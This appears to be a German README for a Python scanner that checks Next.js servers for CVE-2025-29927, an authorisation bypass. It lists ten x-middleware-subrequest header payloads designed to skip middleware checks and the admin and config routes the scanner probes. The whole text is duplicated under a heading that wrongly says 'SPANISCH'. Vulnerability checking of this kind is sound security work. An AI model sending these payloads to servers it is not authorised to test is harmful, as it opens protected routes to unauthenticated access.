
Dieses Skript überprüft die Schwachstelle CVE-2025-29927 in Next.js-Servern, indem es mehrere Payloads im Header x-middleware-subrequest testet, um unbefugte Zugriffe zu erkennen.
CVE-2025-29927 Checker
📌 Einführung
Dieses Skript überprüft die Schwachstelle CVE-2025-29927 in Next.js-Servern, indem es mehrere Payloads im x-middleware-subrequest-Header testet, um unbefugten Zugriff zu erkennen.
❓ Was ist CVE-2025-29927?
CVE-2025-29927 ist eine Sicherheitslücke, mit der Sicherheitsbeschränkungen in Next.js umgangen werden können, sodass sensible Routen ohne Authentifizierung zugänglich werden.
⚙️ Funktionsweise des Skripts
🔹 1. Importieren der Bibliotheken
Das Skript verwendet:
🛠️ argparse – für die Argumentverarbeitung.
🌐 requests – zum Senden von HTTP-Anfragen.
⏳ time – für Pausen zwischen Tests.
🎨 colorama – zur farbigen Formatierung der Konsolenausgabe.
🔹 2. Payload-Liste
Das Skript testet mehrere Payloads im x-middleware-subrequest-Header, die entwickelt wurden, um Sicherheitsbeschränkungen zu umgehen. Beispiel:
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. Sensible Routen
Das Skript analysiert Antworten auf Pfade wie:
/admin, /dashboard, /settings, /private, /config
🔹 4. Scan-Prozess
✅ Zeigt ein Banner in der Konsole an.✅ Sendet HTTP-Anfragen mit verschiedenen Payloads.✅ Prüft, ob der Server Next.js verwendet.✅ Erkennt Zugriffe auf sensible Routen und meldet Schwachstellen.
🔹 5. Fehlerbehandlung
Das Skript behandelt Ausnahmen, um Unterbrechungen aufgrund von Verbindungsfehlern zu vermeiden.
🚀 Beispielverwendung
Führen Sie das Skript aus mit:
python script.py -t https://example.com/api/auth
📢 Haftungsausschluss
Dieses Tool dient ausschließlich ethischen Tests und autorisiertem Gebrauch. Die unbefugte Nutzung gegenüber Drittsystemen ist illegal.
===================SPANISCH===================
CVE-2025-29927 Checker
📌 Einführung
Dieses Skript überprüft die Schwachstelle CVE-2025-29927 in Next.js-Servern, indem es mehrere Payloads im x-middleware-subrequest-Header testet, um unbefugten Zugriff zu erkennen.
❓ Was ist CVE-2025-29927?
CVE-2025-29927 ist eine Sicherheitslücke, mit der Sicherheitsbeschränkungen in Next.js umgangen werden können, sodass sensible Routen ohne Authentifizierung zugänglich werden.
⚙️ Funktionsweise des Skripts
🔹 1. Importieren der Bibliotheken
Das Skript verwendet:
🛠️ argparse – für die Argumentverarbeitung.
🌐 requests – zum Senden von HTTP-Anfragen.
⏳ time – für Pausen zwischen Tests.
🎨 colorama – zur farbigen Formatierung der Konsolenausgabe.
🔹 2. Payload-Liste
Das Skript testet mehrere Payloads im x-middleware-subrequest-Header, die entwickelt wurden, um Sicherheitsbeschränkungen zu umgehen. Beispiel:
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. Sensible Routen
Das Skript analysiert Antworten auf Pfade wie:
/admin, /dashboard, /settings, /private, /config
🔹 4. Scan-Prozess
✅ Zeigt ein Banner in der Konsole an.✅ Sendet HTTP-Anfragen mit verschiedenen Payloads.✅ Prüft, ob der Server Next.js verwendet.✅ Erkennt Zugriffe auf sensible Routen und meldet Schwachstellen.
🔹 5. Fehlerbehandlung
Das Skript behandelt Ausnahmen, um Unterbrechungen aufgrund von Verbindungsfehlern zu vermeiden.
🚀 Beispielverwendung
Führen Sie das Skript aus mit:
python script.py -t https://example.com/api/auth
📢 Haftungsausschluss
Dieses Tool dient ausschließlich ethischen Tests und autorisiertem Gebrauch. Die unbefugte Nutzung gegenüber Drittsystemen ist illegal.